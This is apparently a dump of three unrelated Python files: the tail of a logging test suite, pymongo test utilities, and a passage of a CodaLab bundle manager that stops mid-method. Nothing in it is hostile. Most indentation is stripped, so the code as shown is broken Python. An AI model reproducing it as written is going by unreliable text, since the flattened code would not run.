('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
            #Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
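# Protocol note: logging.config.listen() reads a 4-byte big-endian length
# prefix and then that many bytes of config data, which is exactly the frame
# the send loop above builds with struct.pack('>L', len(text)).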
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class HandlerTest(BaseTest):
@unittest.skipIf(os.name == 'nt' or (os.name == 'java' and os._name == 'nt'),
'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
try:
h.close()
except ValueError:
pass
if os.path.exists(fn):
os.unlink(fn)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
ChildLoggerTest, HandlerTest)
if __name__ == "__main__":
test_main()
|
utils.py
|
# Copyright 2012-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for testing pymongo
"""
import collections
import contextlib
import functools
import os
import re
import sys
import threading
import time
import warnings
from collections import defaultdict
from functools import partial
from bson import json_util, py3compat
from bson.objectid import ObjectId
from pymongo import (MongoClient,
monitoring, read_preferences)
from pymongo.errors import ConfigurationError, OperationFailure
from pymongo.monitoring import _SENSITIVE_COMMANDS, ConnectionPoolListener
from pymongo.pool import PoolOptions
from pymongo.read_concern import ReadConcern
from pymongo.read_preferences import ReadPreference
from pymongo.server_selectors import (any_server_selector,
writable_server_selector)
from pymongo.write_concern import WriteConcern
from test import (client_context,
db_user,
db_pwd)
IMPOSSIBLE_WRITE_CONCERN = WriteConcern(w=1000)
class WhiteListEventListener(monitoring.CommandListener):
def __init__(self, *commands):
self.commands = set(commands)
self.results = defaultdict(list)
def started(self, event):
if event.command_name in self.commands:
self.results['started'].append(event)
def succeeded(self, event):
if event.command_name in self.commands:
self.results['succeeded'].append(event)
def failed(self, event):
if event.command_name in self.commands:
self.results['failed'].append(event)
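# Usage sketch (assumes a reachable MongoDB server; names are hypothetical):
# command listeners are registered when the client is constructed, e.g.
#     listener = WhiteListEventListener('insert')
#     client = MongoClient(event_listeners=[listener])
#     client.test.coll.insert_one({'x': 1})
#     listener.results['started'][0].command_name  # -> 'insert'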
class CMAPListener(ConnectionPoolListener):
def __init__(self):
self.events = []
def reset(self):
self.events = []
def add_event(self, event):
self.events.append(event)
def event_count(self, event_type):
return len([event for event in self.events[:]
if isinstance(event, event_type)])
def connection_created(self, event):
self.add_event(event)
def connection_ready(self, event):
self.add_event(event)
def connection_closed(self, event):
self.add_event(event)
def connection_check_out_started(self, event):
self.add_event(event)
def connection_check_out_failed(self, event):
self.add_event(event)
def connection_checked_out(self, event):
self.add_event(event)
def connection_checked_in(self, event):
self.add_event(event)
def pool_created(self, event):
self.add_event(event)
def pool_cleared(self, event):
self.add_event(event)
def pool_closed(self, event):
self.add_event(event)
class EventListener(monitoring.CommandListener):
def __init__(self):
self.results = defaultdict(list)
def started(self, event):
self.results['started'].append(event)
def succeeded(self, event):
self.results['succeeded'].append(event)
def failed(self, event):
self.results['failed'].append(event)
def started_command_names(self):
"""Return list of command names started."""
return [event.command_name for event in self.results['started']]
def reset(self):
"""Reset the state of this listener."""
self.results.clear()
class OvertCommandListener(EventListener):
"""A CommandListener that ignores sensitive commands."""
def started(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).started(event)
def succeeded(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).succeeded(event)
def failed(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).failed(event)
class ServerAndTopologyEventListener(monitoring.ServerListener,
monitoring.TopologyListener):
"""Listens to all events."""
def __init__(self):
self.results = []
def opened(self, event):
self.results.append(event)
def description_changed(self, event):
self.results.append(event)
def closed(self, event):
self.results.append(event)
class HeartbeatEventListener(monitoring.ServerHeartbeatListener):
"""Listens to only server heartbeat events."""
def __init__(self):
self.results = []
def started(self, event):
self.results.append(event)
def succeeded(self, event):
self.results.append(event)
def failed(self, event):
self.results.append(event)
class MockSocketInfo(object):
def close(self):
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
class MockPool(object):
def __init__(self, *args, **kwargs):
self.pool_id = 0
self._lock = threading.Lock()
self.opts = PoolOptions()
def get_socket(self, all_credentials):
return MockSocketInfo()
def return_socket(self, *args, **kwargs):
pass
def _reset(self):
with self._lock:
self.pool_id += 1
def reset(self):
self._reset()
def close(self):
self._reset()
def update_is_writable(self, is_writable):
pass
def remove_stale_sockets(self, reference_pool_id):
pass
class ScenarioDict(dict):
"""Dict that returns {} for any unknown key, recursively."""
def __init__(self, data):
def convert(v):
if isinstance(v, collections.Mapping):
return ScenarioDict(v)
if isinstance(v, (py3compat.string_type, bytes)):
return v
if isinstance(v, collections.Sequence):
return [convert(item) for item in v]
return v
dict.__init__(self, [(k, convert(v)) for k, v in data.items()])
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
# Unlike a defaultdict, don't set the key, just return a dict.
return ScenarioDict({})
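# For example: ScenarioDict({'a': {'b': 1}})['a']['b'] == 1, while unknown keys
# chain safely -- ScenarioDict({})['missing']['nested'] evaluates to {}.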
class CompareType(object):
"""Class that compares equal to any object of the given type."""
def __init__(self, type):
self.type = type
def __eq__(self, other):
return isinstance(other, self.type)
def __ne__(self, other):
"""Needed for Python 2."""
return not self.__eq__(other)
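# For example: CompareType(int) == 5 is True and CompareType(int) == 'five' is
# False, which is handy when asserting against event fields of unknown value.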
class FunctionCallRecorder(object):
"""Utility class to wrap a callable and record its invocations."""
def __init__(self, function):
self._function = function
self._call_list = []
def __call__(self, *args, **kwargs):
self._call_list.append((args, kwargs))
return self._function(*args, **kwargs)
def reset(self):
"""Wipes the call list."""
self._call_list = []
def call_list(self):
"""Returns a copy of the call list."""
return self._call_list[:]
@property
def call_count(self):
"""Returns the number of times the function has been called."""
return len(self._call_list)
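# Usage sketch (wrapping a hypothetical callable): recorder =
# FunctionCallRecorder(len); recorder('abc') returns 3, recorder.call_count is
# then 1, and recorder.call_list() == [(('abc',), {})].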
class TestCreator(object):
"""Class to create test cases from specifications."""
def __init__(self, create_test, test_class, test_path):
"""Create a TestCreator object.
:Parameters:
- `create_test`: callback that returns a test case. The callback
must accept the following arguments - a dictionary containing the
entire test specification (the `scenario_def`), a dictionary
containing the specification for which the test case will be
generated (the `test_def`).
- `test_class`: the unittest.TestCase class in which to create the
test case.
- `test_path`: path to the directory containing the JSON files with
the test specifications.
"""
self._create_test = create_test
self._test_class = test_class
self.test_path = test_path
def _ensure_min_max_server_version(self, scenario_def, method):
"""Test modifier that enforces a version range for the server on a
test case."""
if 'minServerVersion' in scenario_def:
min_ver = tuple(
int(elt) for
elt in scenario_def['minServerVersion'].split('.'))
if min_ver is not None:
method = client_context.require_version_min(*min_ver)(method)
if 'maxServerVersion' in scenario_def:
max_ver = tuple(
int(elt) for
elt in scenario_def['maxServerVersion'].split('.'))
if max_ver is not None:
method = client_context.require_version_max(*max_ver)(method)
return method
@staticmethod
def valid_topology(run_on_req):
return client_context.is_topology_type(
run_on_req.get('topology', ['single', 'replicaset', 'sharded']))
@staticmethod
def min_server_version(run_on_req):
version = run_on_req.get('minServerVersion')
if version:
min_ver = tuple(int(elt) for elt in version.split('.'))
return client_context.version >= min_ver
return True
@staticmethod
def max_server_version(run_on_req):
version = run_on_req.get('maxServerVersion')
if version:
max_ver = tuple(int(elt) for elt in version.split('.'))
return client_context.version <= max_ver
return True
def should_run_on(self, scenario_def):
run_on = scenario_def.get('runOn', [])
if not run_on:
# Always run these tests.
return True
for req in run_on:
if (self.valid_topology(req) and
self.min_server_version(req) and
self.max_server_version(req)):
return True
return False
def ensure_run_on(self, scenario_def, method):
"""Test modifier that enforces a 'runOn' on a test case."""
return client_context._require(
lambda: self.should_run_on(scenario_def),
"runOn not satisfied",
method)
def tests(self, scenario_def):
"""Allow CMAP spec test to override the location of test."""
return scenario_def['tests']
def create_tests(self):
for dirpath, _, filenames in os.walk(self.test_path):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
# Use tz_aware=False to match how CodecOptions decodes
# dates.
opts = json_util.JSONOptions(tz_aware=False)
scenario_def = ScenarioDict(
json_util.loads(scenario_stream.read(),
json_options=opts))
test_type = os.path.splitext(filename)[0]
# Construct test from scenario.
for test_def in self.tests(scenario_def):
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_").replace('.', '_'),
str(test_def['description'].replace(" ", "_").replace(
'.', '_')))
new_test = self._create_test(
scenario_def, test_def, test_name)
new_test = self._ensure_min_max_server_version(
scenario_def, new_test)
new_test = self.ensure_run_on(
scenario_def, new_test)
new_test.__name__ = test_name
setattr(self._test_class, new_test.__name__, new_test)
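# Naming sketch (hypothetical paths): a test described as "simple find" in a
# file 'find-one.json' under a directory named 'crud' would be attached to the
# test class as a method called 'test_crud_find_one_simple_find'.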
def _connection_string(h, authenticate):
if h.startswith("mongodb://"):
return h
elif client_context.auth_enabled and authenticate:
return "mongodb://%s:%s@%s" % (db_user, db_pwd, str(h))
else:
return "mongodb://%s" % (str(h),)
def _mongo_client(host, port, authenticate=True, direct=False, **kwargs):
"""Create a new client over SSL/TLS if necessary."""
host = host or client_context.host
port = port or client_context.port
client_options = client_context.default_client_options.copy()
if client_context.replica_set_name and not direct:
client_options['replicaSet'] = client_context.replica_set_name
client_options.update(kwargs)
client = MongoClient(_connection_string(host, authenticate), port,
**client_options)
return client
def single_client_noauth(h=None, p=None, **kwargs):
"""Make a direct connection. Don't authenticate."""
return _mongo_client(h, p, authenticate=False, direct=True, **kwargs)
def single_client(h=None, p=None, **kwargs):
"""Make a direct connection, and authenticate if necessary."""
return _mongo_client(h, p, direct=True, **kwargs)
def rs_client_noauth(h=None, p=None, **kwargs):
"""Connect to the replica set. Don't authenticate."""
return _mongo_client(h, p, authenticate=False, **kwargs)
def rs_client(h=None, p=None, **kwargs):
"""Connect to the replica set and authenticate if necessary."""
return _mongo_client(h, p, **kwargs)
def rs_or_single_client_noauth(h=None, p=None, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Like rs_or_single_client, but does not authenticate.
"""
return _mongo_client(h, p, authenticate=False, **kwargs)
def rs_or_single_client(h=None, p=None, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Authenticates if necessary.
"""
return _mongo_client(h, p, **kwargs)
def ensure_all_connected(client):
"""Ensure that the client's connection pool has socket connections to all
members of a replica set. Raises ConfigurationError when called with a
non-replica set client.
Depending on the use-case, the caller may need to clear any event listeners
that are configured on the client.
"""
ismaster = client.admin.command("isMaster")
if 'setName' not in ismaster:
raise ConfigurationError("cluster is not a replica set")
target_host_list = set(ismaster['hosts'])
connected_host_list = set([ismaster['me']])
admindb = client.get_database('admin')
# Run isMaster until we have connected to each host at least once.
while connected_host_list != target_host_list:
ismaster = admindb.command("isMaster",
read_preference=ReadPreference.SECONDARY)
connected_host_list.update([ismaster["me"]])
def one(s):
"""Get one element of a set"""
return next(iter(s))
def oid_generated_on_process(oid):
"""Makes a determination as to whether the given ObjectId was generated
by the current process, based on the 5-byte random number in the ObjectId.
"""
return ObjectId._random() == oid.binary[4:9]
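# Layout note: an ObjectId is 12 bytes -- a 4-byte timestamp, a 5-byte
# process-wide random value, and a 3-byte incrementing counter -- so the
# slice oid.binary[4:9] above is the per-process random portion.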
def delay(sec):
return '''function() { sleep(%f * 1000); return true; }''' % sec
def get_command_line(client):
command_line = client.admin.command('getCmdLineOpts')
assert command_line['ok'] == 1, "getCmdLineOpts() failed"
return command_line
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
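# For example (hypothetical inputs): camel_to_snake('maxStalenessSeconds')
# returns 'max_staleness_seconds' and camel_to_snake('readConcern') returns
# 'read_concern'.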
def camel_to_upper_camel(camel):
return camel[0].upper() + camel[1:]
def camel_to_snake_args(arguments):
for arg_name in list(arguments):
c2s = camel_to_snake(arg_name)
arguments[c2s] = arguments.pop(arg_name)
return arguments
def parse_collection_options(opts):
if 'readPreference' in opts:
opts['read_preference'] = parse_read_preference(
opts.pop('readPreference'))
if 'writeConcern' in opts:
opts['write_concern'] = WriteConcern(
**dict(opts.pop('writeConcern')))
if 'readConcern' in opts:
opts['read_concern'] = ReadConcern(
**dict(opts.pop('readConcern')))
return opts
def server_started_with_option(client, cmdline_opt, config_opt):
"""Check if the server was started with a particular option.
:Parameters:
- `cmdline_opt`: The command line option (e.g. --nojournal)
- `config_opt`: The config file option (e.g. nojournal)
"""
command_line = get_command_line(client)
if 'parsed' in command_line:
parsed = command_line['parsed']
if config_opt in parsed:
return parsed[config_opt]
argv = command_line['argv']
return cmdline_opt in argv
def server_started_with_auth(client):
try:
command_line = get_command_line(client)
except OperationFailure as e:
msg = e.details.get('errmsg', '')
if e.code == 13 or 'unauthorized' in msg or 'login' in msg:
# Unauthorized.
return True
raise
# MongoDB >= 2.0
if 'parsed' in command_line:
parsed = command_line['parsed']
# MongoDB >= 2.6
if 'security' in parsed:
security = parsed['security']
# >= rc3
if 'authorization' in security:
return security['authorization'] == 'enabled'
# < rc3
return security.get('auth', False) or bool(security.get('keyFile'))
return parsed.get('auth', False) or bool(parsed.get('keyFile'))
# Legacy
argv = command_line['argv']
return '--auth' in argv or '--keyFile' in argv
def server_started_with_nojournal(client):
command_line = get_command_line(client)
# MongoDB 2.6.
if 'parsed' in command_line:
parsed = command_line['parsed']
if 'storage' in parsed:
storage = parsed['storage']
if 'journal' in storage:
return not storage['journal']['enabled']
return server_started_with_option(client, '--nojournal', 'nojournal')
def server_is_master_with_slave(client):
command_line = get_command_line(client)
if 'parsed' in command_line:
return command_line['parsed'].get('master', False)
return '--master' in command_line['argv']
def drop_collections(db):
# Drop all non-system collections in this database.
for coll in db.list_collection_names(
filter={"name": {"$regex": r"^(?!system\.)"}}):
db.drop_collection(coll)
def remove_all_users(db):
db.command("dropAllUsersFromDatabase", 1,
writeConcern={"w": client_context.w})
def joinall(threads):
"""Join threads with a 5-minute timeout, assert joins succeeded"""
for t in threads:
t.join(300)
assert not t.is_alive(), "Thread %s hung" % t
def connected(client):
"""Convenience to wait for a newly-constructed client to connect."""
with warnings.catch_warnings():
# Ignore warning that "ismaster" is always routed to primary even
# if client's read preference isn't PRIMARY.
warnings.simplefilter("ignore", UserWarning)
client.admin.command('ismaster') # Force connection.
return client
def wait_until(predicate, success_description, timeout=10):
"""Wait up to 10 seconds (by default) for predicate to be true.
E.g.:
wait_until(lambda: client.primary == ('a', 1),
'connect to the primary')
If the lambda-expression isn't true after 10 seconds, we raise
AssertionError("Didn't ever connect to the primary").
Returns the predicate's first true value.
"""
start = time.time()
interval = min(float(timeout)/100, 0.1)
while True:
retval = predicate()
if retval:
return retval
if time.time() - start > timeout:
raise AssertionError("Didn't ever %s" % success_description)
time.sleep(interval)
def is_mongos(client):
res = client.admin.command('ismaster')
return res.get('msg', '') == 'isdbgrid'
def assertRaisesExactly(cls, fn, *args, **kwargs):
"""
Unlike the standard assertRaises, this checks that a function raises a
specific class of exception, and not a subclass. E.g., check that
MongoClient() raises ConnectionFailure but not its subclass, AutoReconnect.
"""
try:
fn(*args, **kwargs)
except Exception as e:
assert e.__class__ == cls, "got %s, expected %s" % (
e.__class__.__name__, cls.__name__)
else:
raise AssertionError("%s not raised" % cls)
@contextlib.contextmanager
def _ignore_deprecations():
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
yield
def ignore_deprecations(wrapped=None):
"""A context manager or a decorator."""
if wrapped:
@functools.wraps(wrapped)
def wrapper(*args, **kwargs):
with _ignore_deprecations():
return wrapped(*args, **kwargs)
return wrapper
else:
return _ignore_deprecations()
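# Usage sketch: as a decorator, @ignore_deprecations silences
# DeprecationWarning for the whole decorated call; as a context manager,
# `with ignore_deprecations(): ...` silences it only for the enclosed block.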
class DeprecationFilter(object):
def __init__(self, action="ignore"):
"""Start filtering deprecations."""
self.warn_context = warnings.catch_warnings()
self.warn_context.__enter__()
warnings.simplefilter(action, DeprecationWarning)
def stop(self):
"""Stop filtering deprecations."""
self.warn_context.__exit__()
self.warn_context = None
def get_pool(client):
"""Get the standalone, primary, or mongos pool."""
topology = client._get_topology()
server = topology.select_server(writable_server_selector)
return server.pool
def get_pools(client):
"""Get all pools."""
return [
server.pool for server in
client._get_topology().select_servers(any_server_selector)]
# Constants for run_threads and lazy_client_trial.
NTRIALS = 5
NTHREADS = 10
def run_threads(collection, target):
"""Run a target function in many threads.
target is a function taking a Collection and an integer.
"""
threads = []
for i in range(NTHREADS):
bound_target = partial(target, collection, i)
threads.append(threading.Thread(target=bound_target))
for t in threads:
t.start()
for t in threads:
t.join(60)
assert not t.is_alive()
@contextlib.contextmanager
def frequent_thread_switches():
"""Make concurrency bugs more likely to manifest."""
interval = None
if not sys.platform.startswith('java'):
if hasattr(sys, 'getswitchinterval'):
interval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
else:
interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
yield
finally:
if not sys.platform.startswith('java'):
if hasattr(sys, 'setswitchinterval'):
sys.setswitchinterval(interval)
else:
sys.setcheckinterval(interval)
def lazy_client_trial(reset, target, test, get_client):
"""Test concurrent operations on a lazily-connecting client.
`reset` takes a collection and resets it for the next trial.
`target` takes a lazily-connecting collection and an index from
0 to NTHREADS, and performs some operation, e.g. an insert.
`test` takes the lazily-connecting collection and asserts a
post-condition to prove `target` succeeded.
"""
collection = client_context.client.pymongo_test.test
with frequent_thread_switches():
for i in range(NTRIALS):
reset(collection)
lazy_client = get_client()
lazy_collection = lazy_client.pymongo_test.test
run_threads(lazy_collection, target)
test(lazy_collection)
def gevent_monkey_patched():
"""Check if gevent's monkey patching is active."""
# In Python 3.6 importing gevent.socket raises an ImportWarning.
with warnings.catch_warnings():
warnings.simplefilter("ignore", ImportWarning)
try:
import socket
import gevent.socket
return socket.socket is gevent.socket.socket
except ImportError:
return False
def eventlet_monkey_patched():
"""Check if eventlet's monkey patching is active."""
try:
import threading
import eventlet
return (threading.current_thread.__module__ ==
'eventlet.green.threading')
except ImportError:
return False
def is_greenthread_patched():
return gevent_monkey_patched() or eventlet_monkey_patched()
def disable_replication(client):
"""Disable replication on all secondaries, requires MongoDB 3.2."""
for host, port in client.secondaries:
secondary = single_client(host, port)
secondary.admin.command('configureFailPoint', 'stopReplProducer',
mode='alwaysOn')
def enable_replication(client):
"""Enable replication on all secondaries, requires MongoDB 3.2."""
for host, port in client.secondaries:
secondary = single_client(host, port)
secondary.admin.command('configureFailPoint', 'stopReplProducer',
mode='off')
class ExceptionCatchingThread(threading.Thread):
"""A thread that stores any exception encountered from run()."""
def __init__(self, *args, **kwargs):
self.exc = None
super(ExceptionCatchingThread, self).__init__(*args, **kwargs)
def run(self):
try:
super(ExceptionCatchingThread, self).run()
except BaseException as exc:
self.exc = exc
raise
def parse_read_preference(pref):
# Make first letter lowercase to match read_pref's modes.
mode_string = pref.get('mode', 'primary')
mode_string = mode_string[:1].lower() + mode_string[1:]
mode = read_preferences.read_pref_mode_from_name(mode_string)
max_staleness = pref.get('maxStalenessSeconds', -1)
tag_sets = pref.get('tag_sets')
return read_preferences.make_read_preference(
mode, tag_sets=tag_sets, max_staleness=max_staleness)
|
bundle_manager.py
|
import datetime
import logging
import os
import random
import re
import sys
import threading
import time
import traceback
from codalab.objects.permission import check_bundles_have_read_permission
from codalab.common import PermissionError, NotFoundError
from codalab.lib import bundle_util, formatting, path_util
from codalab.server.worker_info_accessor import WorkerInfoAccessor
from codalab.worker.file_util import remove_path
from codalab.worker.bundle_state import State, RunResources
logger = logging.getLogger(__name__)
WORKER_TIMEOUT_SECONDS = 60
SECONDS_PER_DAY = 60 * 60 * 24
# Fail unresponsive bundles in uploading, staged and running state after this many days.
BUNDLE_TIMEOUT_DAYS = 60
class BundleManager(object):
"""
Assigns run bundles to workers and builds make bundles.
"""
def __init__(self, codalab_manager):
config = codalab_manager.config.get('workers')
if not config:
print('config.json file missing a workers section.', file=sys.stderr)
sys.exit(1)
self._model = codalab_manager.model()
self._worker_model = codalab_manager.worker_model()
self._bundle_store = codalab_manager.bundle_store()
self._upload_manager = codalab_manager.upload_manager()
self._exiting_lock = threading.Lock()
self._exiting = False
self._make_uuids_lock = threading.Lock()
self._make_uuids = set()
def parse(to_value, field):
return to_value(config[field]) if field in config else None
self._max_request_time = parse(formatting.parse_duration, 'max_request_time') or 0
self._max_request_memory = parse(formatting.parse_size, 'max_request_memory') or 0
self._max_request_disk = parse(formatting.parse_size, 'max_request_disk') or 0
self._default_cpu_image = config.get('default_cpu_image')
self._default_gpu_image = config.get('default_gpu_image')
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
def run(self, sleep_time):
logger.info('Bundle manager running!')
while not self._is_exiting():
try:
self._run_iteration()
except Exception:
traceback.print_exc()
time.sleep(sleep_time)
while self._is_making_bundles():
time.sleep(sleep_time)
def signal(self):
with self._exiting_lock:
self._exiting = True
def _is_exiting(self):
with self._exiting_lock:
return self._exiting
def _run_iteration(self):
self._stage_bundles()
self._make_bundles()
self._schedule_run_bundles()
self._fail_unresponsive_bundles()
def _stage_bundles(self):
"""
Stages bundles by:
1) Failing any bundles that have any missing or failed dependencies.
2) Staging any bundles that have all ready dependencies.
"""
bundles = self._model.batch_get_bundles(state=State.CREATED)
parent_uuids = set(dep.parent_uuid for bundle in bundles for dep in bundle.dependencies)
parents = self._model.batch_get_bundles(uuid=parent_uuids)
all_parent_states = {parent.uuid: parent.state for parent in parents}
all_parent_uuids = set(all_parent_states)
bundles_to_fail = []
bundles_to_stage = []
for bundle in bundles:
parent_uuids = set(dep.parent_uuid for dep in bundle.dependencies)
try:
check_bundles_have_read_permission(
self._model, self._model.get_user(bundle.owner_id), parent_uuids
)
except PermissionError as e:
bundles_to_fail.append((bundle, str(e)))
continue
missing_uuids = parent_uuids - all_parent_uuids
if missing_uuids:
bundles_to_fail.append(
(bundle, 'Missing parent bundles: %s' % ', '.join(missing_uuids))
)
continue
parent_states = {uuid: all_parent_states[uuid] for uuid in parent_uuids}
acceptable_states = [State.READY]
if bundle.metadata.allow_failed_dependencies:
acceptable_states.append(State.FAILED)
acceptable_states.append(State.KILLED)
else:
failed_uuids = [
uuid for uuid, state in parent_states.items() if state == State.FAILED
]
killed_uuids = [
uuid for uuid, state in parent_states.items() if state == State.KILLED
]
failure_message = ''
if failed_uuids:
failure_message += ' Parent bundles failed: %s' % ', '.join(failed_uuids)
if killed_uuids:
failure_message += ' Parent bundles were killed: %s' % ', '.join(killed_uuids)
if failure_message:
failure_message += ' (Please use the --allow-failed-dependencies flag to depend on results of failed or killed bundles)'
bundles_to_fail.append((bundle, failure_message))
continue
if all(state in acceptable_states for state in parent_states.values()):
bundles_to_stage.append(bundle)
for bundle, failure_message in bundles_to_fail:
logger.info('Failing bundle %s: %s', bundle.uuid, failure_message)
self._model.update_bundle(
bundle, {'state': State.FAILED, 'metadata': {'failure_message': failure_message}}
)
for bundle in bundles_to_stage:
logger.info('Staging %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.STAGED})
def _make_bundles(self):
# Re-stage any stuck bundles. This would happen if the bundle manager
# died.
for bundle in self._model.batch_get_bundles(state=State.MAKING, bundle_type='make'):
if not self._is_making_bundle(bundle.uuid):
logger.info('Re-staging make bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.STAGED})
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='make'):
logger.info('Making bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.MAKING})
with self._make_uuids_lock:
self._make_uuids.add(bundle.uuid)
# Making a bundle could take time, so do the work in a separate
# thread to ensure quick scheduling.
threading.Thread(target=BundleManager._make_bundle, args=[self, bundle]).start()
def _is_making_bundles(self):
with self._make_uuids_lock:
return bool(self._make_uuids)
def _is_making_bundle(self, uuid):
with self._make_uuids_lock:
return uuid in self._make_uuids
def _make_bundle(self, bundle):
try:
bundle_location = self._bundle_store.get_bundle_location(bundle.uuid)
path = os.path.normpath(bundle_location)
deps = []
for dep in bundle.dependencies:
parent_bundle_path = os.path.normpath(
self._bundle_store.get_bundle_location(dep.parent_uuid)
)
dependency_path = os.path.normpath(
os.path.join(parent_bundle_path, dep.parent_path)
)
if not dependency_path.startswith(parent_bundle_path) or (
not os.path.islink(dependency_path) and not os.path.exists(dependency_path)
):
raise Exception(
'Invalid dependency %s'
% (path_util.safe_join(dep.parent_uuid, dep.parent_path))
)
child_path = os.path.normpath(os.path.join(path, dep.child_path))
if not child_path.startswith(path):
raise Exception('Invalid key for dependency: %s' % (dep.child_path))
deps.append((dependency_path, child_path))
remove_path(path)
if len(deps) == 1 and deps[0][1] == path:
path_util.copy(deps[0][0], path, follow_symlinks=False)
else:
